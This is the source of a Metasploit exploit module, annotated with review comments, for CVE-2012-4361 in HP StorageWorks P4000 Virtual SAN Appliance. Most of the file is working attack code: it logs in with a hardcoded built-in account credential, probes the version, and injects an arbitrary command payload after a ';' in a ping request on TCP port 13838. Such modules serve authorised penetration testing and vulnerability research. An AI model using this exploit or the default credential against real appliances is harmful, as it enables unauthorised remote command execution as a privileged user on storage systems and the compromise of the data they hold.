Path: blob/master/modules/exploits/multi/misc/hp_vsa_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for CVE-2012-4361: command injection in the HP StorageWorks
# P4000 Virtual SAN Appliance management service (TCP 13838 by default).
# As described in the module metadata below, the service accepts a login
# with a built-in account, after which a "ping" request carries arbitrary
# commands.  Flow: connect, optionally auto-detect the appliance version by
# trial logins, log in, send the crafted ping request, hand off to the
# payload handler.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  # Module metadata and options.  Points worth knowing when reading the rest:
  # - 'BadChars' => "/": the payload is embedded in a '/'-delimited request
  #   path (see #exploit), so a '/' inside it would presumably split the path.
  # - Target 0 ('Automatic') triggers version probing in #get_target; targets
  #   1 and 2 carry the 'Version' string that is echoed in the login packet.
  # - RPORT defaults to 13838, the port named in the description.
  def initialize(info={})
    super(update_info(info,
      'Name'           => "HP StorageWorks P4000 Virtual SAN Appliance Command Execution",
      'Description'    => %q{
          This module exploits a vulnerability found in HP's StorageWorks P4000 VSA on
        versions prior to 9.5. By using a default account credential, it is possible
        to inject arbitrary commands as part of a ping request via port 13838.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Nicolas Gregoire',  #Discovery, PoC, additional assistance
          'sinn3r'             #Metasploit module
        ],
      'References'     =>
        [
          ['CVE', '2012-4361'],
          ['OSVDB', '82087'],
          ['EDB', '18893'],
          ['URL', 'http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?loc=en_US&id=958'],
          ['URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03082086'],
          ['URL', 'http://www.agarri.fr/blog/archives/2012/02/index.html']  # Original Disclosure
        ],
      'Payload'        =>
        {
          # '/' separates path segments in the injected request (see #exploit).
          'BadChars' => "/",
          'Compat'   =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl telnet'
            }
        },
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread'
        },
      'Platform'       => %w{ linux unix },
      'Arch'           => ARCH_CMD,
      # 'Version' is interpolated into the login packet for explicit targets;
      # 'Automatic' has none and is resolved by #get_target.
      'Targets'        =>
        [
          [ 'Automatic', {} ],
          [ 'HP VSA up to 8.5', { 'Version' => '8.5.0' } ],
          [ 'HP VSA 9', { 'Version' => '9.0.0' } ]
        ],
      'Privileged'     => true,
      'DisclosureDate' => '2011-11-11',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptPort.new('RPORT', [true, 'The remote port', 13838])
      ])
  end


  # Wrap +data+ in the appliance's request envelope.
  #
  # Layout as built below (the fixed fields are reproduced as constants; their
  # meaning is not documented here):
  #   8 bytes  00 00 00 00 00 00 00 01
  #   4 bytes  big-endian length of data plus the trailing NUL ("N*" pack)
  #   4 bytes  zero
  #   8 bytes  zero
  #   8 bytes  00 00 00 14 ff ff ff ff
  #   n bytes  data
  #   1 byte   NUL terminator
  #
  # @param data [String] request body, e.g. a "login:/..." or "get:/..." line
  # @return [String] the binary packet ready for sock.put
  #
  # NOTE(review): the length field uses data.length (characters), not
  # data.bytesize; the two differ if data ever carries multi-byte characters.
  # With the strings built in this module they are equal.  Not changed here.
  def generate_packet(data)
    pkt  = "\x00\x00\x00\x00\x00\x00\x00\x01"
    # +1 accounts for the NUL appended after data below.
    pkt << [data.length + 1].pack("N*")
    pkt << "\x00\x00\x00\x00"
    pkt << "\x00\x00\x00\x00\x00\x00\x00\x00"
    pkt << "\x00\x00\x00\x14\xff\xff\xff\xff"
    pkt << data
    pkt << "\x00"

    pkt
  end

  # Resolve the 'Automatic' target by trial logins.
  #
  # Returns +target+ unchanged when the user picked an explicit version.
  # Otherwise sends a login packet for the built-in 'global$agent' account
  # (fixed credential) advertising version 8.5.0 and then 9.0.0, over the
  # socket already opened by #exploit, and picks the first version whose
  # response contains both "OK" and "Login".  Each response is hex-dumped at
  # verbose level, which is the quickest way to see what the appliance sent.
  #
  # @return [Msf::Module::Target] targets[1] for 8.5.x, targets[2] for 9.0
  # @raise via fail_with(Failure::NoTarget) when neither login is accepted
  #
  # NOTE(review): the failure message ends with a stray apostrophe
  # ("didn't work'"); cosmetic, but it is what the operator sees.
  # NOTE(review): both probes share one connection and each does a single
  # sock.get_once; a late reply to the first probe could be read as the
  # reply to the second.  Not changed here.
  def get_target
    if target.name !~ /Automatic/
      return target
    end

    # Login at 8.5.0
    packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"8.5.0\"")
    print_status("#{rhost}:#{rport} Sending login packet for version 8.5.0")
    sock.put(packet)
    res = sock.get_once
    vprint_status(Rex::Text.to_hex_dump(res)) if res
    # Success criterion: reply mentions both OK and Login.
    if res and res=~ /OK/ and res=~ /Login/
      return targets[1]
    end

    # Login at 9.0.0
    packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"9.0.0\"")
    print_status("#{rhost}:#{rport} Sending login packet for version 9.0.0")
    sock.put(packet)
    res = sock.get_once
    vprint_status(Rex::Text.to_hex_dump(res)) if res
    if res and res=~ /OK/ and res =~ /Login/
      return targets[2]
    end

    fail_with(Failure::NoTarget, "#{rhost}:#{rport} - Target auto detection didn't work'")
  end

  # Main entry point.
  #
  # 1. Open the TCP connection (Tcp mixin, RHOST/RPORT).
  # 2. Pick the target: auto-detect via #get_target (which also performs the
  #    login), or log in with the user-selected target's 'Version' string.
  #    In the manual branch the login response is only hex-dumped, never
  #    checked, so the injection below is sent even if the login failed.
  # 3. Send a "get:/lhn/public/network/ping/..." request whose host field is
  #    "127.0.0.1/foobar;<payload>/" -- the ';' before the payload is the
  #    injection point, and this request path is the most useful indicator
  #    for anyone building detection for this module's traffic.
  #    For the 9.x target two extra path segments "64/5/" are appended; the
  #    match is on the target *name* containing a '9', which among the
  #    declared targets is only 'HP VSA 9'.  Their meaning is not documented
  #    here.
  # 4. Start the payload handler and close the socket.
  def exploit
    connect

    if target.name =~ /Automatic/
      my_target = get_target
      print_good("#{rhost}:#{rport} - Target #{my_target.name} found")
    else
      my_target = target
      print_status("#{rhost}:#{rport} Sending login packet")
      packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"#{my_target['Version']}\"")
      sock.put(packet)
      res = sock.get_once
      # Response is shown for diagnostics only; not validated.
      vprint_status(Rex::Text.to_hex_dump(res)) if res
    end

    # Command execution
    print_status("#{rhost}:#{rport} Sending injection")
    data  = "get:/lhn/public/network/ping/127.0.0.1/foobar;#{payload.encoded}/"
    # Extra trailing segments for the 9.x request format (name-based match).
    data << "64/5/" if my_target.name =~ /9/
    packet = generate_packet(data)
    sock.put(packet)
    res = sock.get_once
    vprint_status(Rex::Text.to_hex_dump(res)) if res

    handler
    disconnect
  end
end